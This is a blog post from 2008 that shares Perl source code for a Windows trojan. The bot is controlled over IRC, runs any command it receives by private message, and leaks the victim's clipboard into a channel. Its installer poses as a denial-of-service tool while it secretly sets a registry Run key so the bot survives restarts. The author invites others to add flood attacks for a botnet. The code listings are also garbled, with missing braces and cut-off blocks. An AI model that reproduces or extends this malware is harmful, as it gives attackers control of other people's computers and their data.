Monday, December 22, 2008

Perl / bot trojan, Could be used for building a bot net, needs a couple more features

This is a perl bot a built then compiled with perlapp to run as a trojan on others computers. It would also be a good candidate for a bot net bot, if someone added syn flood or other various network attacks. If you would like to add supplements to this bot just join the malvager forum and help us out. It can't revive itself out of suspension and needs a password option. Oh yeah and I used this bot tutorial to start with and you will defiantly notice the stolen code.

#!c:/perl/bin/perl.exe -w
#This is published under the gentleman's mal ware license should you
#improve it show the owner and give the owner cred
use Sys::Hostname;
use Net::IRC;
use strict;
use Win32::GUI;
use Win32::Clipboard;
my $hw = Win32::GUI::GetPerlWindow();
#This is a wait, so that if the user isn't connected to a network
#it will wait 45 seconds giving them plenty of times to get connected
my $clip = Win32::Clipboard;
my $host = hostname();
my $capsule = int(rand(99));
my $hoster = $host.$capsule;
my $irc = new Net::IRC;

my $conn = $irc->newconn(
Server => shift || '',
Port => shift || '6667',
Nick => $hoster,
Ircname => 'I like to greet!',
Username => 'fucker'

# We're going to add this to the conn hash so we know what channel we
# want to operate in.
$conn->{channel} = shift || '#9unkz0r';

sub on_connect {

# shift in our connection object that is passed automatically
my $conn = shift;

# when we connect, join our channel and greet it
$conn->privmsg($conn->{channel}, 'Hello everyone!');
$conn->{connected} = 1;


sub on_join {

# get our connection object and the event object, which is passed
# with this event automatically
my ($conn, $event) = @_;

# this is the nick that just joined
my $nick = $event->{nick};
# say hello to the nick in public
$conn->privmsg($conn->{channel}, "Fuck You, $nick!");

sub on_part {

# pretty much the same as above

my ($conn, $event) = @_;

my $nick = $event->{nick};
$conn->privmsg($conn->{channel}, "Such a dick, $nick!");


sub on_msg {
my ($conn, $event) = @_;
my $text = $event->{args}[0];
my $pid;
if($pid = fork){
# Parent
$conn->privmsg($event->{nick}, "$text");
}elsif($pid == 0){
# Child, There is a problem with ram consumption I think using
#exec() rather than system is a good call, has not been tested with exec
# Error
die "Fork did not work\n";
sub on_public {

# on an event, we get connection object and event hash
my ($conn, $event) = @_;

# this is what was said in the event
my $text = $event->{args}[0];

# regex the text to see if it begins with clip
if ($text =~ m/clip/) {

# if so, show the contents of the clipboard, variables stolen from other tut
my $weather_text = $clip->Get();

# wrap text at 400 chars (about as much as you should put
# into a single IRC message
my @texts = $weather_text;
# $event->{to}[0] is the channel where this was said
foreach (@texts) {
$conn->privmsg($event->{to}[0], $_);
$conn->add_handler('public', \&on_public);

$conn->add_handler('msg', \&on_msg);
# add event handlers for join and part events
$conn->add_handler('join', \&on_join);
$conn->add_handler('part', \&on_part);

# The end of MOTD (message of the day), numbered 376 signifies we've connect
$conn->add_handler('376', \&on_connect);


It will run anything from the command line you private message it, And if you type !clip, it will display the persons clipboard.

Here is the install program, it masquerades itself as a ip dos program, but really just puts registry entries in the machine so that it will start on restart.

use Sys::Hostname;
use Tk;
sub on_cc {
my $mw = new MainWindow;
$mw->Label(-text => 'Ip to attack')->pack;
$mw-> Entry() -> pack();
$mw->Label(-text => 'Will not work if IP is invalid')->pack;
$mw->Label(-text => 'Only Click Button Once')->pack;
$mw->Button(-text => 'Nuclear DOS',
-command =>\&on_press)->pack;
sub on_press() {
$host = hostname();
my $regedit = 'REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v ccapp2 /t REG_EXPAND_SZ /d c:\windows';
my $bullshit = $regedit.'\\'.$host.'\RunTimeLib.exe';
my $dirs = 'mkdir c:\windows';
my $dirt = $dirs."\\".$host;
my $cp = 'xcopy .\runtime\RunTimeLib.exe "c:\windows"'."\\".$host;
my $exxe = 'c:\windows'."\\".$host."\\".'RunTimeLib.exe';
my $pid;
if($pid = fork){
# Parent
system('echo starting syn flood');
}elsif($pid == 0){
# Child
# Error
die "Fork did not work\n";

No comments: